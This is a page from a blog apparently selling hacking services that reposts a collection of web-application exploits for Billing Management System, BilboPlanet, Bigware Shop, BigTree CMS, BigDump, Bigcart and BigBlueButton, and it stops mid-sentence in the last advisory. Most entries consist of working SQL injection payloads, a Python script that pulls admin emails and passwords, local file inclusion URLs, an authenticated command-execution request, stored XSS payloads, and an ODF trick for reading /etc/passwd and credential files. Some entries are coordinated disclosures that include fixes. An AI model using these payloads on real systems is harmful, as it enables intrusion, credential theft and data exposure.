Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863119864

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Billing Management System 2.0 - 'email' SQL injection Auth Bypass
# Date: 2021-02-16
# Exploit Author: Pintu Solanki
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html
# Software: Billing Management System 2.0
# Vulnerability Type: SQL injection - Auth Bypass
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
# This application is vulnerable to SQL injection vulnerability.
# Vulnerable Page: http://localhost/smartbilling/smartbilling_source_code/index.php
# Payload used:

Username => admin' or '1'='1
Password => admin' or '1'='1

# POC: Whenever we will go to the page (http://localhost/smartbilling/smartbilling_source_code/index.php) when we inject SQL Payload then we will directly enter into the admin page.
HireHackking 
source: https://www.securityfocus.com/bid/62989/info

BilboPlanet is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://example.com/auth.php
(POST - user_id)
user_id=-1' or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
HireHackking 
# Title: Bigware Shop 2.3.01 Multiple Local File Inclusion Vulnerabilities
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Tested on: Ubuntu-Linux
# Vendor: http://www.bigware.de
# Download: http://www.bigware.de/download/bigware_software_-_vollversion/Bigware_Shop.zip


Proof-of-Concept1:

/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php source-line 58
**********************************************************************
require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
**********************************************************************

[+]Sploit1: http://[target]/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php?language=/../../../../yourFILE.php

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Proof-of-Concept2: 

/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php source-line 56
*********************************************************************
require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
********************************************************************* 

[+]Sploit: http://[target]/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php?language=/../../../../yourFILE.php


=> Vuln-Description: The $language-parameter isn't declared. So an attacker can readin'.
=> Vendor-Solution: Please declare this parameter before require. 



***Greetings fr0m Germany: zone-h.org-Team, exploit-db.com, GoLd_M, Kim Dotcom***

MERRY CHRISTMAS BRO'S! :)
HireHackking 
source: https://www.securityfocus.com/bid/53810/info

Bigware Shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Bigware Shop versions prior to 2.17 are vulnerable. 

#!/usr/bin/python
# -*- coding: utf-8 -*-
import httplib2
import urllib
import sys

# insert your target link here (with trailing slash)
url = "http://www.example.com/"
h = httplib2.Http()

# send sql injection
headerdata = {'Content-type': 'application/x-www-form-urlencoded'}
sqli = '2 AND (SELECT 1 FROM(SELECT COUNT(*), CONCAT((SELECT former_email_address FROM former where former_groups_id like 1 LIMIT 0,1), CHAR(58), (SELECT
 former_password FROM former where former_groups_id like 1 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)'
postdata = {  'voteid' : '2', \
    'pollid' : sqli, \
    'x' : '1', \
    'y' : '1', \
    'forwarder' : 'http%3a%2f%2fdemoshop.bigware.org%2fmain_bigware_53.php%3fop%3dresults%26pollid%3d2'}
response, content = h.request(url + "main_bigware_54.php", "POST", headers=headerdata, body=urllib.urlencode(postdata))
print content, "\n", "\n"
print "If there is an error stating the duplicate admin entry, your shop is vulnerable."
HireHackking 
# Exploit Title: BigTree CMS 4.4.10 - Remote Code Execution
# Google Dork: " BigTree CMS "
# Date: 2020-25-09
# Exploit Author: SunCSR (ThienNV and HoaVT - Sun* Cyber Security Research)
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link: https://www.bigtreecms.org/
# Version: 4.4.10
# Tested on: Windows
# CVE : N/A

## 1. Authenticated Remote Code Execution

# Attack type: Remote
# Impact: Remote arbitrary code execution
# Affected component(s): /core/admin/field-types/list/draw.php
# Attack vectors: Authenticated user (developer) can inject malicious command to the applications via crete new setting function:
# Description: BigTree 4.4.10  and earlier are vulnerable to Authenticated Remote Code Execution vulnerability. An authenticated user (developer) can send a crafted request to the server and perform remote command execution (RCE).
# Severity (CVSS 3.1): Base Score: 9.1 CRITICAL
# POC: Developer create setting and code will be executed when load settings:

POST /BigTreeCMS/site/index.php/admin/developer/settings/create/ HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 388
Origin: http://xxxx
Connection: close
Referer: http://xxxx/BigTreeCMS/site/index.php/admin/developer/settings/add/
Cookie: PHPSESSID=ipmr6c2jplqqlgcdrkgbtg4tfl; bigtree_admin[email]=tadmin%40bigtree.com; bigtree_admin[login]=%5B%22session-5f6d51f54fc301.14043773%22%2C%22chain-5f6d51f54fb248.84144127%22%5D
Upgrade-Insecure-Requests: 1

__csrf_token_PEFN3BUK0DAXK7Y10NJWT5E4813WXTXB__=tx6rzTz4ddDFI60tfcBe8tDN7lJ2YA3WlcdPLm/EbeY=&id=Test rce&name=Test rce&type=list&settings={"list_type":"static","allow-empty":"Yes","list":"whoami","pop-table":"","parser":"system"}&description=<p>Test rce</p>

# Video: https://vimeo.com/461667065

## 2. Authenticated SQL Injection
# Attack type: Remote
#Impact: Authenticated SQl Injection in BigTree CMS
# Attack vectors: Authenticated user (developer) can inject malicious SQL query to the applications via crete new feed function:
# Affected component(s): /core/feeds/custom.php
# Description:BigTree 4.4.10  and earlier are vulnerable to Authenticated SQL Injection vulnerability. An authenticated user (developer) can send a malicious sql query to the server and perform sql query.
# Severity (CVSS 3.1): Base Score: 7.2 HIGH
# POC: Request create or edit feed: 

POST /site/index.php/admin/developer/feeds/create/ HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 379
Origin: http://xxxx
Connection: close
Referer: http://xxxx/site/index.php/admin/developer/feeds/add/
Cookie: yyyy

__csrf_token_RW2U3KT3JXVY70AKWPV9UHG3HWQ12PP4__=S0%2B7MADREPOzg1%2Fkht7xbgzv0uKqrRpuccn2gOmft88%3D&name=SQL+Injection&table=sqli_test+union+select+sleep(5)%23&type=custom&settings=%7B%22sort%22%3A%22%60id%60+ASC%22%2C%22limit%22%3A%222%22%2C%22parser%22%3A%22system%2Cexec%22%7D&description=as&fields%5Bid%5D%5Bwidth%5D=&fields%5Bid%5D%5Btitle%5D=ID&fields%5Bid%5D%5Bparser%5D=12

# Video: https://vimeo.com/461667107

## 3. Authenticated Stored Cross-Site Scripting
# Attack type: Remote
# Impact: Stored XSS
# Affected component(s): site/index.php/admin/pages/update
# Attack vector(s): Authenticated user (developer) can inject malicious Javascript to the applications via crete or update page function:
# Description: Stored XSS vulnerabilities in the BigTree 4.4.10  and earlier allow remote authenticated user with low privilege (editor or publisher) to inject arbitrary web script or HTML via the page content to site/index.php/admin/pages/update
# Severity (CVSS 3): Base Score: 6.5 MEDIUM
# POC: Request create or edit page:

POST /BigTreeCMS/site/index.php/admin/pages/update/ HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------2320192840320212926996245368
Content-Length: 12173
Origin: http://xxx
Connection: close
Referer: http://xxxx/BigTreeCMS/site/index.php/admin/pages/edit/2/
Cookie: yyyy

---some fields here---

<p>&nbsp;<span class="s1"><em>These people are ridiculous and fake. This page is an example of a </em><a href="https://www.bigtreecms.org/docs/dev-guide/templates/" target="_blank" rel="noopener"><span class="s2"><em>basic template</em></span></a><em> with page content and a set of </em><a href="https://www.bigtreecms.org/docs/dev-guide/callouts/" target="_blank" rel="noopener"><span class="s2"><em>callouts</em></span></a><em>. Go to the </em><a href="https://www.bigtreecms.org/docs/dev-guide/installation/" target="_blank" rel="noopener"><span class="s2"><em>BigTree Developer Guide</em></span></a><em> for more.</em></span></p>
<p><span class="s1"><em>XSS here <script>alert(origin)</script></em></span></p>
-----------------------------2320192840320212926996245368	

---some fields here---

# Video: https://vimeo.com/461667129
HireHackking 
BigTree CMS 4.2.3: Multiple SQL Injection Vulnerabilities
Security Advisory – Curesec Research Team

Online-Reference:
http://blog.curesec.com/article/blog/BigTree-CMS-423-Multiple-SQL-Injection-Vulnerabilities-39.html

1. Introduction

Affected Product:   BigTree CMS 4.2.3  
Fixed in:     4.2.4
Fixed Version Link:
https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip  
Vendor Contact:   contribute@bigtreecms.org  
Vulnerability Type:   Multiple SQL Injections  
Remote Exploitable:   Yes  
Reported to vendor:   07/07/2015  
Disclosed to public:   08/07/2015  
Release mode:     Coordinated release  
CVE:       n/a  
Credits     Tim Coen of Curesec GmbH  

2. Vulnerability Description

Various components of the admin area of the BigTree CMS are vulnerable
to SQL injection, which can lead to data leaks as well as compromisation
of the host.

Please note that you have to be authenticated to exploit this issue.

SQL Injection 1

The script that processes page view requests passes the "id" GET request
value to functions which put this value directly into SQL queries. No
prepared statements or escaping is used, thus opening it up to SQL
injection.

Proof of Concept (Show all BigTree users):


http://localhost//BigTree-CMS/site/index.php/admin/pages/view-tree/0'
union all select 1,concat(email, ":", password),3,4,5,6,7,8,9,10 from
bigtree_users %23/

Code:

        core/admin/modules/pages/view-tree.php:151; page id is user
controlled
          $nav_visible =
array_merge($admin->getNaturalNavigationByParent($page["id"],1),$admin->getPendingNavigationByParent($page["id"]));
          $nav_hidden =
array_merge($admin->getHiddenNavigationByParent($page["id"]),$admin->getPendingNavigationByParent($page["id"],""));
          $nav_archived = $admin->getArchivedNavigationByParent($page["id"]);

        core/inc/bigtree/admin.php:2638
        static function getArchivedNavigationByParent($parent) {
                [...]
          $q = sqlquery("SELECT id,nav_title as
title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views
FROM bigtree_pages WHERE parent = '$parent' AND archived = 'on' ORDER BY
nav_title asc");

        core/inc/bigtree/admin.php:3167
        static function getHiddenNavigationByParent($parent) {
                [...]
          $q = sqlquery("SELECT id,nav_title as
title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views
FROM bigtree_pages WHERE parent = '$parent' AND in_nav = '' AND archived
!= 'on' ORDER BY nav_title asc");

        core/inc/bigtree/admin.php:3758
        static function getNaturalNavigationByParent($parent,$levels = 1) {
                [...]
          $q = sqlquery("SELECT id,nav_title AS
title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views
FROM bigtree_pages WHERE parent = '$parent' AND in_nav = 'on' AND
archived != 'on' ORDER BY position DESC, id ASC");

        core/inc/bigtree/admin.php:4531
        static function getPendingNavigationByParent($parent,$in_nav = true) {
                [...]
          $q = sqlquery("SELECT * FROM bigtree_pending_changes WHERE
pending_page_parent = '$parent' AND `table` = 'bigtree_pages' AND type =
'NEW' ORDER BY date DESC");

SQL Injection 2

When creating a new user, the email address is not checked server side,
so it is possible to set it to anything.

When logging in, the email address is saved in the session, and later
used to retrieve user data. This happens without prepared statements,
thus opening the query up to SQL injection.

Proof of Concept:


1. Create User
f'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10%23bar@example.com
2. Log in
3. result can be seen in multiple places

Code:

    core/inc/bigtree/admin.php:81
        $f = sqlfetch(sqlquery("SELECT * FROM bigtree_users WHERE id =
'".$_SESSION["bigtree_admin"]["id"]."' AND email =
'".$_SESSION["bigtree_admin"]["email"]."'"));

SQL Injection 3 (Blind)

The function used to calculate the SEO score of a post for Ajax requests
passes unsanitized user input to a function performing the actual
computation. This function does not use prepared statements, thus
opening it up to SQL injection. The result of the query is never echoed
to the end user, making this a blind SQL injection.

Proof of Concept:



http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score
        POST: content=foo&resources=bar&id=foo' or 1=2%23&title=Trees of
All Sizes


http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score
        POST: content=foo&resources=bar&id=foo' or 1=1%23&title=Trees of
All Sizes

Code:

        core/admin/ajax/pages/get-seo-score.php:4:  
            $seo = $admin->getPageSEORating($_POST,$_POST["resources"]);

        core/inc/bigtree/admin.php:4222
            static function getPageSEORating($page,$content) {
                    [...]
              if ($page["title"]) {
                $score += 5;
                // They have a title, let's see if it's unique
                $r = sqlrows(sqlquery("SELECT * FROM bigtree_pages WHERE
title = '".sqlescape($page["title"])."' AND id != '".$page["id"]."'"));

3. Solution

To mitigate this issue please upgrade at least to version 4.2.3:

https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip

Please note that a newer version might already be available.

4. Report Timeline

07/07/2015   Informed Vendor about Issue
07/08/2015   Vendor send Fixes for confirmation
07/10/2015   Fixes Confirmed
07/26/2015   Vendor releases Version 4.2.3
08/07/2015   Disclosed to public
HireHackking 
# Exploit Title: BigTree CMS 4.2.23 - Cross-Site Scripting
# Date: 2018-10-15 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link : https://github.com/bigtreecms/BigTree-CMS/
# Software : BigTree CMS
# Version : 4.2.23
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : CVE-2018-18308

# In the 4.2.23 version of BigTree, a Stored XSS vulnerability has been discovered 
# in /admin/ajax/file-browser/upload/ (aka the image upload area).
 
# HTTP POST Request :

POST /admin/ajax/file-browser/upload/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/admin/pages/add/0/
Content-Type: multipart/form-data; boundary=---------------------------15148507251045999311737722822
Content-Length: 1574699
Cookie: __utma=242042641.1054742390.1539547796.1539547796.1539547796.1; __utmb=242042641.6.10.1539547796; __utmc=242042641; __utmz=242042641.1539547796.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=fat2c61gglprnotletf1mobnui; hide_bigtree_bar=; bigtree_admin[email]=test%40ismailtasdelen.me; bigtree_admin[login]=%5B%22session-5bc3a4ae5b8016.12355027%22%2C%22chain-5bc3a4ae5b7966.37991866%22%5D; bigtree_admin%5Bpage_properties_open%5D=on
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------15148507251045999311737722822
Content-Disposition: form-data; name="__csrf_token_B2FHVMV815XHACWV8RVV2BTX1EH1YEH6__"

tNvtUi8PU/IDcrgxj1t/Uv/1ciYeF7AudslXD429hkQ=
-----------------------------15148507251045999311737722822
Content-Disposition: form-data; name="folder"

0
-----------------------------15148507251045999311737722822
Content-Disposition: form-data; name="files[]"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")>.jpg"
Content-Type: image/jpeg
HireHackking 
1. ADVISORY INFORMATION
========================================
Title: BigTree CMS <= 4.2.11 Authenticated SQL Injection Vulnerability
Application: BigTree CMS
Remotely Exploitable: Yes
Versions Affected: < 4.2.11
Vendor URL: https://www.bigtreecms.org
Bugs:  SQL Injection
Author: Mehmet Ince
Date of found: 27 Jun 2016


2. CREDIT
========================================
Those vulnerabilities was identified during external penetration test
by Mehmet INCE from PRODAFT / INVICTUS.

Netsparker was used for initial detection.

3. DETAILS
========================================

Following codes shows $page variable is used at inside SQL query without
proper escaping nor PDO.

File : /core/inc/bigtree/admin.php

Lines 6866 - 6879

function submitPageChange($page,$changes) {
if ($page[0] == "p") {
// It's still pending...
$type = "NEW";
$pending = true;
$existing_page = array();
$existing_pending_change = array("id" => substr($page,1));
} else {
// It's an existing page
$type = "EDIT";
$pending = false;
$existing_page = BigTreeCMS::getPage($page);
$existing_pending_change = sqlfetch(sqlquery("SELECT id FROM
bigtree_pending_changes WHERE `table` = 'bigtree_pages' AND item_id =
'$page'"));
}
...
}


Basically submitPageChange function is vulnerable against SQL Injection
vulnerability. This function was used twice during development. Following
list shows location of these function callers.

/core/admin/modules/pages/front-end-update.php
/core/admin/modules/pages/update.php


PoC:

Following HTTP POST request was used in order to exploit the SQL Injection
flaw.

POST /site/index.php/admin/pages/update/ HTTP/1.1
Cache-Control: no-cache
Referer: http://10.0.0.154/site/index.php/admin/pages/edit/2/
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Cookie: PHPSESSID=amsscser3eg7fkljpjjt78ki17; hide_bigtree_bar=;
bigtree_admin[email]=mehmet%40mehmetince.net;
bigtree_admin[login]=%5B%22session-5770eca81c6d86.91986415%22%2C%22chain-5770ec71e2d7d3.28696204%22%5D;
PHPSESSID=lsrbe949jc3na5j1sof19a3s53
Host: 10.0.0.154
Accept-Encoding: gzip, deflate
Content-Length: 2248
Content-Type: multipart/form-data; boundary=b788b047b8e345b792cdc1f81fef2106

--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2097152
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="_bigtree_post_check"

success
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="page"

-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="nav_title"

The Trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="title"

The Trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="publish_at"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="expire_at"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="in_nav"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="redirect_lower"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="trunk"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="external"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="new_window"

Yes
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="resources[page_header]"

The Trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="tag_entry"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="route"

trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="seo_invisible"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="ptype"

Save
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="max_age"

3
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="template"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="meta_keywords"


--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="meta_description"


--b788b047b8e345b792cdc1f81fef2106--


4. TIMELINE
========================================
27 Jun 2016 - Netsparker identified SQL Injection.
27 Jun 2016 - Source code review and finding root cause of SQLi.
27 Jun 2016 - Issue resolved by PRODAFT / INVICTUS team.
27 Jun 2016 - Pull Request has been sended.

https://github.com/bigtreecms/BigTree-CMS/pull/256

-- 
Sr. Information Security Engineer
https://www.mehmetince.net
HireHackking 
===========================================================================================
# Exploit Title: BigTree CMS - 'parent' SQL Inj.
# Dork: N/A
# Date: 24-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link: https://www.bigtreecms.org/download/core/
# Version: v4.3.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: We strongly believe your content managements system
shouldn't require
  you to compromise your vision. BigTree is an extremely extensible open
source CMS built on PHP and MySQL.
  It was created by the expert designers, strategists, and developers at
Fastspot to help you make and maintain better websites.
===========================================================================================
# POC - SQLi
# Parameters : parent
# Attack Pattern :
-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27
# POST Method :
http://localhost/BigTree-CMS/site/index.php/admin/pages/create/
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: BigTree CMS - 'page' SQL Inj.
# Dork: N/A
# Date: 24-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link: https://www.bigtreecms.org/download/core/
# Version: v4.3.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: We strongly believe your content managements system
shouldn't require
  you to compromise your vision. BigTree is an extremely extensible open
source CMS built on PHP and MySQL.
  It was created by the expert designers, strategists, and developers at
Fastspot to help you make and maintain better websites.
===========================================================================================
# POC - SQLi
# Parameters : page
# Attack Pattern : %2527
# GET Method :
http://localhost/BigTree-CMS/site/index.php/admin/ajax/tags/get-page/?page=[SQL
Inject Here]&sort=
===========================================================================================
HireHackking 
source: https://www.securityfocus.com/bid/56744/info

BigDump is prone to a cross-site scripting vulnerability, an SQL-injection vulnerability, and an arbitrary-file-upload vulnerability because it fails to sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, upload arbitrary files, access or modify data, or exploit latent vulnerabilities in the underlying database.

BigDump 0.29b and 0.32b are vulnerable; other versions may also be affected. 

http://www.example.com/bigdump.php?start= [SQL]

http://www.example.com/bigdump.php?start= [XSS]

http://www.example.com/bigdump.php [File Upload]
HireHackking 
# Exploit Title: Bigcart - Ecommerce Multivendor System  1.0 - SQL Injection
# Dork: N/A
# Date: 2019-01-14
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://ocsolutions.co.in/
# Software Link: https://codecanyon.net/item/marketplace-builder-a-complete-ecommerce-multivendor-solution-with-cms/21808220
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/index.php?route=product/category&path=[SQL]
# 

GET /[PATH]/index.php?route=product/category&path=%33%33%5f%36%34%31%34%39%39%39%39%39%27%20%2f%2a%21%31%33%33%33%37%50%72%6f%63%65%44%75%72%65%2a%2f%20%41%6e%41%6c%79%73%65%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%63%6f%6e%63%61%74%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: OCSESSID=19eef2415d8afbee8c2f353629; language=en-gb; currency=USD
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 14 Jan 2019 18:17:53 GMT
Server: Apache
X-Powered-By: PHP/5.6.39
Set-Cookie: OCSESSID=19eef2415d8afbee8c2f353629; path=/
Set-Cookie: OCSESSID=19eef2415d8afbee8c2f353629; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
HireHackking 
# Exploit Title: BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery
# Date: 2020-09-11
# Exploit Author: RedTeam Pentesting GmbH
# Vendor Homepage: https://bigbluebutton.org/
# Version: BigBlueButton 2.2.25


RedTeam Pentesting discovered a vulnerability in the BigBlueButton web
conferencing system which allows participants of a conference with
permissions to upload presentations to read arbitrary files from the
file system and perform server-side requests. This leads to
administrative access to the BigBlueButton instance.


Details
=======

Product: BigBlueButton
Affected Versions: 2.2.25, potentially earlier versions as well
Fixed Versions: 2.2.27
Vulnerability Type: Arbitrary File Disclosure and
                    Server-Side Request Forgery
Security Risk: medium
Vendor URL: https://bigbluebutton.org/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-005
Advisory Status: published
CVE: CVE-2020-25820
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25820


Introduction
============

"BigBlueButton is a web conferencing system designed for online
learning."

(from the vendor's homepage)


More Details
============

BigBlueButton is a web conferencing system that allows participants with
the appropriate privileges to upload files in various formats to be used
as presentation slides. Among other formats, BigBlueButton accepts
LibreOffice documents[1]. LibreOffice documents use the XML-based Open
Document Format for Office Applications (ODF)[2]. For technical
purposes, uploaded files are converted to PDF format with LibreOffice
and afterwards to SVG for displaying[6].

The ODF file format supports using the XML Linking Language (XLink) to
create links between documents[3]. When local files are referenced using
XLinks, the contents of the respective files are included in the
generated PDF file when BigBlueButton converts ODF documents with
LibreOffice. This leads to an arbitrary file disclosure vulnerability,
allowing malicious participants of conferences to extract files from the
BigBlueButton server's file system.

LibreOffice also embeds XLinks to remote locations when a document is
converted, which allows to perform server-side requests.


Proof of Concept
================

Start from an empty ODF Text Document and extract the content:

$ mkdir tmp-doc && cd tmp-doc
$ unzip ../empty.odt
Archive:  empty.odt
 extracting: mimetype
   creating: Configurations2/accelerator/
   creating: Configurations2/images/Bitmaps/
   creating: Configurations2/toolpanel/
   creating: Configurations2/progressbar/
   creating: Configurations2/statusbar/
   creating: Configurations2/toolbar/
   creating: Configurations2/floater/
   creating: Configurations2/popupmenu/
   creating: Configurations2/menubar/
  inflating: manifest.rdf
  inflating: meta.xml
  inflating: settings.xml
 extracting: Thumbnails/thumbnail.png
  inflating: styles.xml
  inflating: content.xml
  inflating: META-INF/manifest.xml


Replace the <office:body> element in the file content.xml with the
following:

<office:body>
  <office:text>
    <text:section text:name="string">
      <text:section-source
        xlink:href="file:///etc/passwd"
        xlink:type="simple"
        xlink:show="embed"
        xlink:actuate="onLoad"/>
    </text:section>
  </office:text>
</office:body>

The text document now includes a section that references the external
file /etc/passwd. Create an new ODF Text Document with the modified
content:

$ zip -r ../modified.odt *

The document can now be uploaded as a presentation. After the
conversion, the presentation shows the contents of the file
/etc/passwd from the system running the BigBlueButton conferencing
software. To perform server-side requests, substitute the xlink:href
attribute's value with a remote URL such as http://example.com:

<office:body>
  <office:text>
    <text:section text:name="string">
      <text:section-source
        xlink:href="http://example.com"
        xlink:type="simple"
        xlink:show="embed"
        xlink:actuate="onLoad"/>
    </text:section>
  </office:text>
</office:body>

When converting a document with this content, LibreOffice will fetch the
website's content and embed it into the generated PDF file.


Workaround
==========

To work around this issue, the conversion feature should be disabled if
it is not used. Otherwise, permission to upload presentations should
only be given to trusted users. Additionally, the allowed file types for
upload can be restricted to just PDF files.


Fix
===

Update to fixed version 2.2.27. Change API key after update.



Security Risk
=============

As shown, the presentation conversion feature of BigBlueButton can be
used to disclose arbitrary local files. Through the file disclosure,
attackers can gain access to the credentials of the BigBlueButton
instance (/usr/share/bbb-web/WEB-INF/classes/bigbluebutton.properties,
/usr/share/bbb-apps-akka/conf/application.conf), which allows for
administrative access to BigBlueButton through its API (see [5]),
including all conferences.

Additionally, it is possible to perform server-side requests. Note that
this vulnerability is different from CVE-2018-10583 [4], because the
risk is not the disclosure of credentials sent while fetching remote
resources, but the ability to access resources that are in the same
network segment as the BigBlueButton instance, which is possibly not
accessible from the Internet.

To exploit this vulnerability, attackers need to have access to a
